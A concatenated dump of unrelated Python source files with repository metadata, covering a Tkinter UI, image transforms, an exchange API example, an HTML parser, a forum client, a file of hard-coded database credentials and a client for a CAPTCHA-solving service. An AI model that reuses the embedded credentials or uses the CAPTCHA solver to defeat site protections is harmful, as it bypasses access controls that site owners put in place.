def handleEventFocusOut(event, wgControl, borderSize = 1, borderColor = "black", imgData1 = None, imgData2 = None,
function = None, execConditionFunc = None, execConditionValue = None):
#Estrutura de uma imgData: (caminho da imagem, (width, height), função condição, valor condição)
handleEvent(event, wgControl, borderSize, borderColor, imgData1, imgData2, function, execConditionFunc, execConditionValue)
def handleEvent(event, wgControl, borderSize = 1, borderColor = "black", imgData1 = None, imgData2 = None,
function = None, execConditionFunc = None, execConditionValue = None):
#Estrutura de uma imgData: (caminho da imagem, (width, height), função condição, valor condição)
if (execConditionFunc != None and execConditionValue != None):
if (execConditionFunc() != execConditionValue):
return
changeImg = False
if (imgData1 != None):
if (imgData1[2] != None):
if (imgData1[2]() == imgData1[3]):
load_image = Image.open(imgData1[0])
load_image = load_image.resize(imgData1[1], Image.ANTIALIAS) #Alterando as dimensões da imagem
render_image = ImageTk.PhotoImage(load_image)
wgControl.configure(image=render_image)
wgControl.image = render_image
changeImg = True
else:
load_image = Image.open(imgData1[0])
load_image = load_image.resize(imgData1[1], Image.ANTIALIAS) #Alterando as dimensões da imagem
render_image = ImageTk.PhotoImage(load_image)
wgControl.configure(image=render_image)
wgControl.image = render_image
changeImg = True
if (imgData2 != None and not changeImg):
if (imgData2[2] != None):
if (imgData2[2]() == imgData2[3]):
load_image = Image.open(imgData2[0])
load_image = load_image.resize(imgData2[1], Image.ANTIALIAS) #Alterando as dimensões da imagem
render_image = ImageTk.PhotoImage(load_image)
wgControl.configure(image=render_image)
wgControl.image = render_image
else:
load_image = Image.open(imgData2[0])
load_image = load_image.resize(imgData2[1], Image.ANTIALIAS) #Alterando as dimensões da imagem
render_image = ImageTk.PhotoImage(load_image)
wgControl.configure(image=render_image)
wgControl.image = render_image
wgControl["highlightthickness"] = borderSize
wgControl["highlightbackground"] = borderColor
if (function != None):
function()
def handleEventMouseLeave(event, wgControl, borderSize = 1, borderColor = "black", imgData1 = None, imgData2 = None,
function = None, execConditionFunc = None, execConditionValue = None):
#Estrutura de uma imgData: (caminho da imagem, (width, height), função condição, valor condição)
handleEvent(event, wgControl, borderSize, borderColor, imgData1, imgData2, function, execConditionFunc, execConditionValue)
print("MOUSE LEAVE!")
def handleEventMouseLeftClick(event, wgControl, borderSize = 1, borderColor = "black", imgData1 = None, imgData2 = None,
function = None, execConditionFunc = None, execConditionValue = None):
#Estrutura de uma imgData: (caminho da imagem, (width, height), função condição, valor condição)
handleEvent(event, wgControl, borderSize, borderColor, imgData1, imgData2, function, execConditionFunc, execConditionValue)
print("CLIQUE")
def loadCommentsByTxtFile(entryFilePath):
filepath = askopenfilename(filetypes=(('text files', 'txt'),))
printEntry(entryFilePath, filepath)
#Apesar da GUI de seleção de arquivos do Windows impedir a inserção de caminhos
#inválidos, não dá pra garantir que tal validação acontecerá em outros SOs,
#por isso se faz a validação
if (not isValidFilePath(filepath)):
return
main.setFilePath(filepath)
main.commentsManagement()
def isValidFilePath(filepath):
return os.path.exists(filepath)
def printEntry(wgEntry, string, aligment = "left"):
originalState = wgEntry["state"]
wgEntry["state"] = "normal"
wgEntry.delete(0, END)
wgEntry.insert(0, string)
wgEntry["justify"] = aligment
wgEntry["state"] = originalState
def showInfoMsgBox(title, message, showMsgFuncCondition = None, showMsgValueCondition = None,
callbackFunction=None, callbackCondition=None):
if (isRunMsgBox(showMsgFuncCondition, showMsgValueCondition)):
msgReturn = messagebox.showinfo(title=title, message=message)
runMsgBoxCallback(msgReturn, callbackFunction, callbackCondition)
def isRunMsgBox(showMsgFuncCondition = None, showMsgValueCondition = None):
return ((showMsgFuncCondition == None or showMsgValueCondition == None) or
(showMsgFuncCondition() == showMsgValueCondition))
def showWarningMsgBox(title, message, showMsgFuncCondition = None, showMsgValueCondition = None,
callbackFunction=None, callbackCondition=None):
if (isRunMsgBox(showMsgFuncCondition, showMsgValueCondition)):
msgReturn = messagebox.showwarning(title=title, message=message)
runMsgBoxCallback(msgReturn, callbackFunction, callbackCondition)
def showErrorMsgBox(title, message, showMsgFuncCondition = None, showMsgValueCondition = None,
callbackFunction=None, callbackCondition=None):
if (isRunMsgBox(showMsgFuncCondition, showMsgValueCondition)):
msgReturn = messagebox.showerror(title=title, message=message)
runMsgBoxCallback(msgReturn, callbackFunction, callbackCondition)
def showAskOkCancelMsgBox(title, message, showMsgFuncCondition = None, showMsgValueCondition = None,
callbackFunction=None, callbackCondition=None):
if (isRunMsgBox(showMsgFuncCondition, showMsgValueCondition)):
msgReturn = messagebox.askokcancel(title=title, message=message)
runMsgBoxCallback(msgReturn, callbackFunction, callbackCondition)
def showAskYesNoMsgBox(title, message, showMsgFuncCondition = None, showMsgValueCondition = None,
callbackFunction=None, callbackCondition=None):
if (isRunMsgBox(showMsgFuncCondition, showMsgValueCondition)):
msgReturn = messagebox.askyesno(title=title, message=message)
runMsgBoxCallback(msgReturn, callbackFunction, callbackCondition)
def runMsgBoxCallback(msgBoxReturn, callbackFunction, callbackCondition):
if (callbackCondition == None or callbackFunction == None):
return
if (msgBoxReturn == callbackCondition):
callbackFunction()
def addComment(comment):
global currentCommentsUIRow
global commentsFrame
global UICommentsQueue
colorAbbreviated = defineBackgroundColorAbbreviatedNameComment(comment) #Define a cor de fundo do widget com o nome do autor do comentário abreviado
message1 = Message(commentsFrame)
message1["text"] = comment["abbreviatedAuthorName"]
message1.grid(row=currentCommentsUIRow, column=0)
message2 = Message(commentsFrame)
message2["text"] = comment["authorName"]
message2.grid(row=currentCommentsUIRow, column=1)
message3 = Message(commentsFrame)
message3["text"] = comment["time"]
message3.grid(row=currentCommentsUIRow, column=2)
currentCommentsUIRow += 1
message4 = Message(commentsFrame)
message4["text"] = comment["text"]
message4.grid(row=currentCommentsUIRow, column=1)
currentCommentsUIRow += 1
main.setCommentState(comment, 1)
UIComment = {"wgAbbreviatedAuthorName": message1,
"colorAbbreviated": colorAbbreviated,
"wgAuthorName": message2, "wgTime": message3,
"wgText": message4}
UICommentsQueue.append(UIComment)
formatCommentForLoaded(len(UICommentsQueue) - 1)
def defineBackgroundColorAbbreviatedNameComment(comment):
comment2 = searchUICommentByAuthorName(comment["authorName"])
if(comment2 == None):
colorAbbreviated = ui_consts.COLORS_ABBREVIATED_AUTHOR_NAME[randint(0, 10)]
else:
colorAbbreviated = comment2["colorAbbreviated"]
return colorAbbreviated
def searchUICommentByAuthorName(authorName):
global UICommentsQueue
for i in range(len(UICommentsQueue)):
UIComment = UICommentsQueue[i]
if (UIComment["wgAuthorName"]["text"] == authorName):
return UIComment
return None
def formatCommentForRead(index):
global UICommentsQueue
UIComment = UICommentsQueue[index]
UIComment["wgAbbreviatedAuthorName"]["bg"] = UIComment["colorAbbreviated"]
UIComment["wgAuthorName"]["fg"] = ui_consts.THRID_FG_COLOR
UIComment["wgTime"]["fg"] = ui_consts.TIME_COMMENT_FG_COLOR_READ_STATE
UIComment["wgText"]["fg"] = ui_consts.THRID_FG_COLOR
def formatCommentForLoaded(index):
global UICommentsQueue
UIComment = UICommentsQueue[index]
UIComment["wgAbbreviatedAuthorName"].configure(width = 16, font=('Verdana', 8, 'normal'),
bg=ui_consts.COMMENT_FG_COLOR_LOADED_STATE, fg="#FFFFFF", bd=0)
UIComment["wgAuthorName"].configure(font=('Verdana', 10, 'bold'), bg="#FFFFFF",
fg=ui_consts.COMMENT_FG_COLOR_LOADED_STATE, bd=0, width=200, padx=10)
UIComment["wgTime"].configure(font=('Verdana', 8, 'normal'), bg="#FFFFFF",
fg=ui_consts.COMMENT_FG_COLOR_LOADED_STATE, bd=0, width=100)
UIComment["wgText"].configure(font=('Verdana', 10, 'normal'), bg="#FFFFFF",
fg=ui_consts.COMMENT_FG_COLOR_LOADED_STATE, bd=0, width=200, padx=10)
def updateStatusBar(text, backGroundColor = ui_consts.CONTROLS_BG_COLOR, fontColor = ui_consts.SECOND_FG_COLOR):
global lblStatusBar
global root
lblStatusBar["text"] = text
lblStatusBar["bg"] = backGroundColor
lblStatusBar["fg"] = fontColor
root.update() #Para atualizar qualquer mudança visual na barra de status
def resetVariables():
resetPositionScrbarCommentCanvas()
resetCommentsFrame()
resetCurrentCommentsUIRow() #Essa função tem que ser chamada apenas depois da resetCommentsFrame()
resetUICommentsQueue() #Essa função tem que ser chamada apenas depois da resetPositionScrbarCommentCanvas()
resetEtrCurrentTime()
def resetCurrentCommentsUIRow():
global currentCommentsUIRow
currentCommentsUIRow = 0
def resetUICommentsQueue():
global UICommentsQueue
UICommentsQueue.clear()
def resetCommentsFrame():
#Deletando widgets dentro do frame:
global currentCommentsUIRow
global commentsFrame
for widgets in commentsFrame.winfo_children():
widgets.destroy()
currentCommentsUIRow = 0
def resetEtrCurrentTime():
global etrCurrentTime
printEntry(etrCurrentTime, "00:00:00")
etrCurrentTime.focus_set() #Para disparar o evento
def resetPositionScrbarCommentCanvas():
positionsScrbarByUIComment(0)
def configPauseTime():
main.setTimeStateToStop()
def configPlayTime():
main.setTimeStateToPlay()
def handleEventPlayPauseButtonMouseLeftClick():
global root
global btnPlayPause
focusOnPlayPauseButton(btnPlayPause) #Para retirar o foco do etrCurrentTime, caso o usuário tenha clicado nele
if(not validateCurrentTime()):
return #Valida o valor que está em etrCurrentTime, caso o usuário tenha alterado
if(main.isTimeStatePlay()):
configPauseTime()
else:
configPlayTime()
main.timeManagement()
def validateCurrentTime():
global etrCurrentTime
if (not isEtrCurrentTimeLastWidgetFocusIn()):
etrCurrentTime["fg"] = "white"
updateStatusBar("")
return True
isvalidNumberSeparators = validateTotalNumberSeparatorsCurrentTime()
if(not isvalidNumberSeparators):
etrCurrentTime["fg"] = "red"
updateStatusBar(ui_consts.ETR_CURRENT_TIME_WARNING_TEXT_MSG, "red")
#showWarningMsgBox(ui_consts.ETR_CURRENT_TIME_WARNING_TITLE_MSG, ui_consts.ETR_CURRENT_TIME_WARNING_TEXT_MSG)
return False #Não dá para colocar os dois valores booleanos em um if só, pois ter um número de separadores inválido gera bug na validação seguinte
isvalidNumbers = validateNumbersCurrentTime()
if (not isvalidNumbers):
etrCurrentTime["fg"] = "red"
updateStatusBar(ui_consts.ETR_CURRENT_TIME_WARNING_TEXT_MSG, "red")
return False
#showWarningMsgBox(ui_consts.ETR_CURRENT_TIME_WARNING_TITLE_MSG, ui_consts.ETR_CURRENT_TIME_WARNING_TEXT_MSG)
etrCurrentTime["fg"] = "white"
updateStatusBar("")
main.setCurrentTime(main.convertStrTimeToSeconds(etrCurrentTime.get()))
main.checkCommentsToChangeStateByCurrentTimeUserInput()
return True
def validateTotalNumberSeparatorsCurrentTime():
global etrCurrentTime
return etrCurrentTime.get().count(ui_consts.ETR_CURRENT_TIME_SEPARATOR) == 2
def validateNumbersCurrentTime():
global etrCurrentTime
h, m, s = etrCurrentTime.get().split(':')
if (not h.isnumeric() or not m.isnumeric() or not s.isnumeric()):
#A função isnumeric() retorna False se a string for vazia
return False
totalTime = main.timeData["totalTime"]
strCurrentTime = h + ":" + m + ":" + s
currentTime = main.convertStrTimeToSeconds(strCurrentTime)
return currentTime <= totalTime
def focusOnPlayPauseButton(buttonPlayPause):
buttonPlayPause.focus_set()
def updateUICurrentTime(text):
global etrCurrentTime
global root
printEntry(etrCurrentTime, text, aligment="center")
root.update()
def updateUICurrentTimeBar(width):
global lblCurrentTimeBar
global root
if (width == 0):
lblCurrentTimeBar.place_forget() #Para torna não visível o widget
return
lblCurrentTimeBar.place(x=10, y=145)
load_image = Image.open(ui_consts.IMAGE_PATH_CURRENT_TIME_BAR)
load_image = load_image.resize((width, lblCurrentTimeBar.image.height()), Image.ANTIALIAS)
render_image = ImageTk.PhotoImage(load_image)
#lblCurrentTimeBar.configure(image="") #Deletando imagem anterior
lblCurrentTimeBar.configure(image=render_image)
lblCurrentTimeBar.image = render_image
lblCurrentTimeBar["bd"] = 0
lblCurrentTimeBar["highlightthickness"] = 0
root.update()
def updateUITotalTime(text):
global lblTotalTime
global root
lblTotalTime["text"] = text
root.update()
def handleOptionMenuSelectChange(value):
main.updateTimeVelocityByUI(float(value.rstrip("x")))
def handleEtrCurrentTimeChange(var):
global etrCurrentTime
if (not isEtrCurrentTimeLastWidgetFocusIn()):
return
content = var.get()
if (len(content) == 0):
return
if (not content.isascii()): #Verifica se todos os caracteres são ascii
var.set("")
lastCharInput = content[len(content) - 1]
if (not isCharAsciiNumber(lastCharInput)):
var.set(content[0:len(content) - 1])
if(len(content) > 8):
var.set(content[0:len(content) - 1])
if (len(content) == 2 or len(content) == 5):
etrCurrentTime.insert(END, ":")
def getUIComment(index):
global UICommentsQueue
if (index < 0 or index >= len(UICommentsQueue)):
return None
return UICommentsQueue[index]
def positionsScrbarByUIComment(UIcommentIndex):
global scrbarCanvasComment
global cnvComments
if (not main.isScrollBarAutoMoveEnabled()):
return
UIComment = getUIComment(UIcommentIndex)
if (UIComment == None):
return
xWgAbbName = UIComment["wgAbbreviatedAuthorName"].winfo_x()
yWgAbbName = UIComment["wgAbbreviatedAuthorName"].winfo_y()
fraction = scrbarCanvasComment.fraction(xWgAbbName, yWgAbbName)
print("FRACTION = " + str(fraction))
cnvComments.yview_moveto(fraction)
def isCharAsciiNumber(char):
return ord(char) >= 48 and ord(char) <= 57
def isEtrCurrentTimeLastWidgetFocusIn():
global lastWidgetFocusIn
return lastWidgetFocusIn == "." + ui_consts.ETR_CURRENT_TIME_NAME
def handleCkbScrollbarAutoMove():
global CkbScrollbarAutoMoveVar
print(CkbScrollbarAutoMoveVar.get())
main.updateConfigScrollBarAutoMove(CkbScrollbarAutoMoveVar.get())
def defineRootProtocols():
global root
root.wm_protocol("WM_DELETE_WINDOW", lambda title=ui_consts.MSG_BOX_CLOSE_PROGRAM_TITLE,
message=ui_consts.MSG_BOX_CLOSE_PROGRAM_TEXT, showMsgFuncCondition=None,
showMsgValueCondition=None, callbackFunction = handleEventcloseRoot,
callbackCondition = True: showAskYesNoMsgBox(title, message, showMsgFuncCondition,
showMsgValueCondition, callbackFunction, callbackCondition))
def handleEventcloseRoot():
global root
updateStatusBar(ui_consts.STATUS_BAR_CLOSE_PROGRAM)
if (main.hasAliveThread()):
main.isCloseProgram = True
root.after(1000, root.destroy) #1000ms é o tempo máximo que a thread que conta segundo ficará sem conferir a condição de seu loop
else:
root.destroy()
def executaUI():
global root
root = Tk()
defineRootProtocols()
buildUI(root)
root.mainloop()
| 43.233094 | 179 | 0.734183 |
968bd7e966b21df41fe968cc089315cad32e78d9 | 1,936 | py | Python | transforms.py | hmdliu/Deep-Learning-S22 | c7753f543b64d3a7773d6ee3b64ea6018e141c4d | [
"MIT"
] | null | null | null | transforms.py | hmdliu/Deep-Learning-S22 | c7753f543b64d3a7773d6ee3b64ea6018e141c4d | [
"MIT"
] | null | null | null | transforms.py | hmdliu/Deep-Learning-S22 | c7753f543b64d3a7773d6ee3b64ea6018e141c4d | [
"MIT"
] | null | null | null |
# Mainly adopted from competition start code
import random
import torch
from torchvision.transforms import ColorJitter
from torchvision.transforms import functional as F
def _flip_coco_person_keypoints(kps, width):
flip_inds = [0, 2, 1, 4, 3, 6, 5, 8, 7, 10, 9, 12, 11, 14, 13, 16, 15]
flipped_data = kps[:, flip_inds]
flipped_data[..., 0] = width - flipped_data[..., 0]
# Maintain COCO convention that if visibility == 0, then x, y = 0
inds = flipped_data[..., 2] == 0
flipped_data[inds] = 0
return flipped_data
class Compose(object):
def __init__(self, transforms):
self.transforms = transforms
def __call__(self, image, target):
for t in self.transforms:
image, target = t(image, target)
return image, target
class RandomHorizontalFlip(object):
def __init__(self, prob):
self.prob = prob
def __call__(self, image, target):
if random.random() < self.prob:
height, width = image.shape[-2:]
image = image.flip(-1)
bbox = target["boxes"]
bbox[:, [0, 2]] = width - bbox[:, [2, 0]]
target["boxes"] = bbox
if "masks" in target:
target["masks"] = target["masks"].flip(-1)
if "keypoints" in target:
keypoints = target["keypoints"]
keypoints = _flip_coco_person_keypoints(keypoints, width)
target["keypoints"] = keypoints
return image, target
class Jitter(object):
def __init__(self):
self.jitter = ColorJitter(
brightness=[0.1, 2.0],
contrast=[0.1, 2.0],
saturation=[0.1, 2.0],
hue=[-0.1, 0.1]
)
def __call__(self, image, target):
return self.jitter(image), target
class ToTensor(object):
def __call__(self, image, target):
image = F.to_tensor(image)
return image, target
| 29.333333 | 74 | 0.583161 |
9bbac4fa999498bf023dd8f9737e459dd888a8b5 | 92 | py | Python | auth_public.py | Marsovc1/Projektna-naloga-OPB | 61fba488fe7520f7db64482ca82b5226e11a44d9 | [
"MIT"
] | null | null | null | auth_public.py | Marsovc1/Projektna-naloga-OPB | 61fba488fe7520f7db64482ca82b5226e11a44d9 | [
"MIT"
] | 3 | 2020-08-04T08:53:08.000Z | 2020-08-18T19:33:49.000Z | auth_public.py | Marsovc1/Projektna-naloga-OPB | 61fba488fe7520f7db64482ca82b5226e11a44d9 | [
"MIT"
] | 1 | 2020-05-02T08:11:42.000Z | 2020-05-02T08:11:42.000Z | db = 'sem2020_nikolajc'
host = 'baza.fmf.uni-lj.si'
user = 'javnost'
password = 'javnogeslo' | 23 | 27 | 0.706522 |
8ad7c1528151e216b4616edef4577f055fbde958 | 2,399 | py | Python | appengine/trooper_o_matic/appengine_module/trooper_o_matic/test/controller_test.py | mithro/chromium-infra | d27ac0b230bedae4bc968515b02927cf9e17c2b7 | [
"BSD-3-Clause"
] | null | null | null | appengine/trooper_o_matic/appengine_module/trooper_o_matic/test/controller_test.py | mithro/chromium-infra | d27ac0b230bedae4bc968515b02927cf9e17c2b7 | [
"BSD-3-Clause"
] | null | null | null | appengine/trooper_o_matic/appengine_module/trooper_o_matic/test/controller_test.py | mithro/chromium-infra | d27ac0b230bedae4bc968515b02927cf9e17c2b7 | [
"BSD-3-Clause"
] | null | null | null | # Copyright (c) 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import datetime
import json
import unittest
import webapp2
import webtest
import endpoints
from protorpc import protojson
from appengine_module.trooper_o_matic import controller
from appengine_module.trooper_o_matic import cron
from appengine_module.trooper_o_matic import models
from appengine_module.trooper_o_matic import trooper_o_api
from appengine_module.trooper_o_matic.test import testing_common
from appengine_module.trooper_o_matic.test import test_data
from appengine_module.testing_utils import testing
def MockNow():
return datetime.datetime(2014, 1, 1, 12)
class CoverageTest(testing.AppengineTestCase):
def setUp(self): # pylint: disable=E1002
super(CoverageTest, self).setUp()
# restricted=False is needed for testing.
# Initialized here because setUp() has to be run first.
self.app_module = endpoints.api_server(
[trooper_o_api.TrooperOMaticAPI],
restricted=False
)
testing_common.StubUrlfetch(test_data.URLFETCH_RESPONSES,
stub=self.testbed.get_stub('urlfetch'))
cron.datetime_now = MockNow
def _make_api_call(self, method, params=None, status=None):
params = params or {}
return self.test_app.post_json(
'/_ah/spi/TrooperOMaticAPI.%s' % method,
params=params,
status=status,
)
def testCqStats(self):
project = 'chromium'
cron_app = webtest.TestApp(
webapp2.WSGIApplication([
('/check-cq', cron.CheckCQHandler),
])
)
cron_app.get('/check-cq')
cq_data = self._make_api_call(
'cq_stats_get',
params={'project': project},
).json
generated = {}
for name, klass in (('single_run_data', models.CqStat),
('queue_time_data', models.CqTimeInQueueForPatchStat),
('total_time_data', models.CqTotalTimeForPatchStat)):
generated[name] = [
protojson.decode_message(klass.ProtoModel(), json.dumps(x))
for x in cq_data[name]]
expected = controller.get_cq_stats(project)
for key in expected:
expected[key] = [x.ToMessage() for x in expected[key]]
self.assertEqual(generated, expected)
if __name__ == '__main__':
unittest.main()
| 29.256098 | 78 | 0.699041 |
9fbe833cd1e2f69b8d8ec85bfec62e01a343bede | 1,486 | py | Python | examples/async/exchange_client/accounts_rpc/7_OrderStates.py | CtheSky/sdk-python | c1b1ae931f4970832466a004eb193027bdc1dea5 | [
"Apache-2.0"
] | null | null | null | examples/async/exchange_client/accounts_rpc/7_OrderStates.py | CtheSky/sdk-python | c1b1ae931f4970832466a004eb193027bdc1dea5 | [
"Apache-2.0"
] | null | null | null | examples/async/exchange_client/accounts_rpc/7_OrderStates.py | CtheSky/sdk-python | c1b1ae931f4970832466a004eb193027bdc1dea5 | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 Injective Labs
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Injective Exchange API client for Python. Example only."""
import asyncio
import logging
from pyinjective.async_client import AsyncClient
from pyinjective.constant import Network
async def main() -> None:
network = Network.testnet()
client = AsyncClient(network, insecure=True)
spot_order_hashes = ["0xce0d9b701f77cd6ddfda5dd3a4fe7b2d53ba83e5d6c054fb2e9e886200b7b7bb", "0x2e2245b5431638d76c6e0cc6268970418a1b1b7df60a8e94b8cf37eae6105542"]
derivative_order_hashes = ["0x82113f3998999bdc3892feaab2c4e53ba06c5fe887a2d5f9763397240f24da50", "0xbb1f036001378cecb5fff1cc69303919985b5bf058c32f37d5aaf9b804c07a06"]
orders = await client.get_order_states(spot_order_hashes=spot_order_hashes, derivative_order_hashes=derivative_order_hashes)
print(orders)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
asyncio.get_event_loop().run_until_complete(main())
| 43.705882 | 170 | 0.800808 |
799fc7f9f8a171e94ff1d5be1f16a6b39cea077d | 3,139 | py | Python | envinorma/io/parse_html.py | Envinorma/envinorma-data | 85c00abc1af9a3b14912229b0789a0d1d5ae7b69 | [
"MIT"
] | 4 | 2020-12-11T09:40:12.000Z | 2022-03-08T13:43:35.000Z | envinorma/io/parse_html.py | Envinorma/envinorma-data | 85c00abc1af9a3b14912229b0789a0d1d5ae7b69 | [
"MIT"
] | 104 | 2020-12-10T15:20:13.000Z | 2021-09-30T13:05:00.000Z | envinorma/io/parse_html.py | Envinorma/envinorma-data | 85c00abc1af9a3b14912229b0789a0d1d5ae7b69 | [
"MIT"
] | null | null | null | from typing import Any, List, Union
from bs4 import BeautifulSoup
from bs4.element import Tag
from envinorma.models.text_elements import Cell, EnrichedString, Linebreak, Row, Table, TextElement, Title
def _ensure_str(element: TextElement) -> str:
if not isinstance(element, str):
raise ValueError(f'Expecting str, received {type(element)}')
return element
def _ensure_strs_and_join(elements: List[TextElement]) -> str:
return '\n'.join([_ensure_str(x).strip() for x in elements])
def _extract_cell_data(cell: Tag) -> EnrichedString:
return EnrichedString(_ensure_strs_and_join(merge_between_linebreaks(_extract_text_elements_with_linebreaks(cell))))
def _is_header(row: Tag) -> bool:
return row.find('th') is not None
def _extract_row_data(row: Tag) -> Row:
cell_iterator = row.find_all('td' if row.find('td') else 'th')
res = [
Cell(_extract_cell_data(cell), int(cell.get('colspan') or 1), int(cell.get('rowspan') or 1)) # type: ignore
for cell in cell_iterator
]
return Row(res, _is_header(row))
def extract_table_from_soup(soup: Union[BeautifulSoup, Tag]) -> Table:
row_iterator = soup.find_all('tr')
table_data = [_extract_row_data(row) for row in row_iterator] # type: ignore
return Table(table_data)
def extract_table(html: str) -> Table:
soup = BeautifulSoup(html, 'html.parser')
return extract_table_from_soup(soup)
def _extract_text_elements_with_linebreaks(content: Any) -> List[TextElement]:
if isinstance(content, str):
return [content]
if isinstance(content, Tag):
if content.name in ('h1', 'h2', 'h3', 'h4', 'h5', 'h6'):
id_ = content.get('id')
return [Title(' '.join(content.stripped_strings), level=int(content.name[1]), id=id_)] # type: ignore
if content.name == 'br':
return [Linebreak()]
if content.name == 'table':
return [extract_table_from_soup(content)]
children = [element for tag in content.children for element in _extract_text_elements_with_linebreaks(tag)]
if content.name in ('p', 'div'):
children = [Linebreak(), *children, Linebreak()]
return children
if content is None:
return []
raise ValueError(f'Unexpected type {type(content)}')
def merge_between_linebreaks(elements: List[TextElement]) -> List[TextElement]:
res: List[TextElement] = []
current_str = ''
for element in elements:
if isinstance(element, str):
current_str += element
elif isinstance(element, (Table, Title)):
if current_str:
res.append(current_str)
current_str = ''
res.append(element)
else:
if not isinstance(element, Linebreak):
raise AssertionError()
if current_str:
res.append(current_str)
current_str = ''
if current_str:
res.append(current_str)
return res
def extract_text_elements(content: Any) -> List[TextElement]:
return merge_between_linebreaks(_extract_text_elements_with_linebreaks(content))
| 34.494505 | 120 | 0.661994 |
ebf2bdc400a4675510a3da4654449b803248896a | 1,341 | py | Python | touclick/chaojiying.py | silianpan/seal-spider-demo | 23bf013d08f9edaf23823bc3787f579bccd0ec3a | [
"Apache-2.0"
] | null | null | null | touclick/chaojiying.py | silianpan/seal-spider-demo | 23bf013d08f9edaf23823bc3787f579bccd0ec3a | [
"Apache-2.0"
] | 3 | 2021-09-08T01:11:16.000Z | 2022-03-02T15:14:03.000Z | touclick/chaojiying.py | silianpan/seal-spider-demo | 23bf013d08f9edaf23823bc3787f579bccd0ec3a | [
"Apache-2.0"
] | 1 | 2019-08-04T09:57:29.000Z | 2019-08-04T09:57:29.000Z | import requests
from hashlib import md5
class Chaojiying(object):
def __init__(self, username, password, soft_id):
self.username = username
self.password = md5(password.encode('utf-8')).hexdigest()
self.soft_id = soft_id
self.base_params = {
'user': self.username,
'pass2': self.password,
'softid': self.soft_id,
}
self.headers = {
'Connection': 'Keep-Alive',
'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)',
}
def post_pic(self, im, codetype):
"""
im: 图片字节
codetype: 题目类型 参考 http://www.chaojiying.com/price.html
"""
params = {
'codetype': codetype,
}
params.update(self.base_params)
files = {'userfile': ('ccc.jpg', im)}
r = requests.post('http://upload.chaojiying.net/Upload/Processing.php', data=params, files=files, headers=self.headers)
return r.json()
def report_error(self, im_id):
"""
im_id:报错题目的图片ID
"""
params = {
'id': im_id,
}
params.update(self.base_params)
r = requests.post('http://upload.chaojiying.net/Upload/ReportError.php', data=params, headers=self.headers)
return r.json()
z
| 27.9375 | 127 | 0.55481 |
70b1bf1a1546b9da660ed09b25af041982d80fe7 | 5,234 | py | Python | tbgclient/TBGSession.py | tbgers/tbgclient | bd0d4484086b1f966a32fc009806e28798287cad | [
"MIT"
] | 1 | 2022-02-27T01:34:11.000Z | 2022-02-27T01:34:11.000Z | tbgclient/TBGSession.py | tbgers/tbgclient | bd0d4484086b1f966a32fc009806e28798287cad | [
"MIT"
] | 2 | 2021-10-21T20:29:38.000Z | 2022-01-15T01:08:51.000Z | tbgclient/TBGSession.py | tbgers/tbgclient | bd0d4484086b1f966a32fc009806e28798287cad | [
"MIT"
] | null | null | null | """An implementation of a TBG session."""
import re
import requests
from . import api
from .Flags import Flags
from .Post import Post
from .TBGException import *
from .Topic import Topic
from .Forum import Forum
from .User import User
from .ChatConnection import ChatConnection
from . import parsers
class TBGSession:
"""An object that defines a TBG session.
This class provides a client session while also functions as a wrapper
of tbgclient.api.
Parameters
----------
user: str
Username of the TBG account. If left blank, the Flags.NO_LOGIN
flag will be set.
password: str
Password of the TBG account. If left blank, the Flags.NO_LOGIN
flag will be set.
flags: tbgclient.Flags
Flags for the session. See tbgclient.Flags for more information.
Variables
---------
session: request.Session()
The client session.
uID: int
The user ID of the session. This will be updated if update() is
called.
"""
user = ""
password = ""
uID = None
flags: Flags = Flags.NONE
def __init__(self, user: str = None, password: str = None, flags: Flags = Flags.NONE):
"""Initiates the class."""
self.flags = flags
if password is None or user is None:
# enter guest mode
self.flags |= Flags.NO_LOGIN
self.user = user
self.password = password
if Flags.MULTI_USER in self.flags:
self.session = api.SessionMultiple()
else:
self.session = requests.Session()
if Flags.NO_LOGIN not in self.flags:
req = self.login()
def __repr__(self):
return f"TBGSession(user={repr(self.user)},password={repr(self.password)},flags={repr(self.flags)})"
def get_post(self, pid: int):
"""Gets a post."""
self.session, req = api.get_post(self.session, pid)
if Flags.RAW_DATA not in self.flags:
result = Post(**parsers.default.get_post(req.text, pid), flags=self.flags, session=self)
if Flags.NO_INIT not in self.flags:
result.update(full=False)
return result
else:
return parsers.default.get_post(req.text, pid)
def delete_post(self, pid: int):
"""Deletes a post."""
self.session, req = api.delete_post(self.session, pid)
return req
def get_topic(self, tid: int):
"""Gets a topic."""
self.session, req = api.get_topic(self.session, tid)
if Flags.RAW_DATA not in self.flags:
result = Topic(**parsers.default.get_page(req.text), flags=self.flags, session=self)
if Flags.NO_INIT not in self.flags:
result.update(full=False)
return result
else:
return parsers.default.get_page(req.text, tid)
def get_forum(self, fid: int):
"""Gets a forum."""
self.session, req = api.get_forum(self.session, fid)
if Flags.RAW_DATA not in self.flags:
result = Forum(**parsers.default.get_forum_page(req.text), flags=self.flags, session=self)
if Flags.NO_INIT not in self.flags:
result.update(full=False)
return result
else:
return parsers.default.get_forum_page(req.text, fid)
def get_user(self, uID: int):
"""Gets a user."""
self.session, req = api.get_user(self.session, uID)
if Flags.RAW_DATA not in self.flags:
return User(**parsers.default.get_user(req.text), flags=self.flags)
else:
return parsers.default.get_user(req.text)
def create_chat_connection(self, channel: int, **kwargs):
"""Creates a chat connection.
This is identical to ChatConnection(**kwargs, session=self).connect(channel).
"""
connect = ChatConnection(**kwargs, session=self)
return connect
def post_reply(self, post: str, tid: int):
"""Posts a post.
This is identical to self.get_topic(tid).post_reply(post).
"""
topic = self.get_topic(tid)
return topic.post_reply(post)
def login(self):
"""Logs into the TBGs."""
self.session, req = api.login(self.session, self.user, self.password)
# verify if you're logged in, for some reason the forums will send 200 even if your user/pass is invalid
match = re.findall('<p class="conl">(.+)</p>', req.text)
if len(match) != 0:
raise CredentialsException(
f"Login failed, you have a faulty credential information. {tuple(match)}"
)
return req
def to_user(self):
"""Casts TBGSession to User."""
if self.uID is None:
# user id is not defined
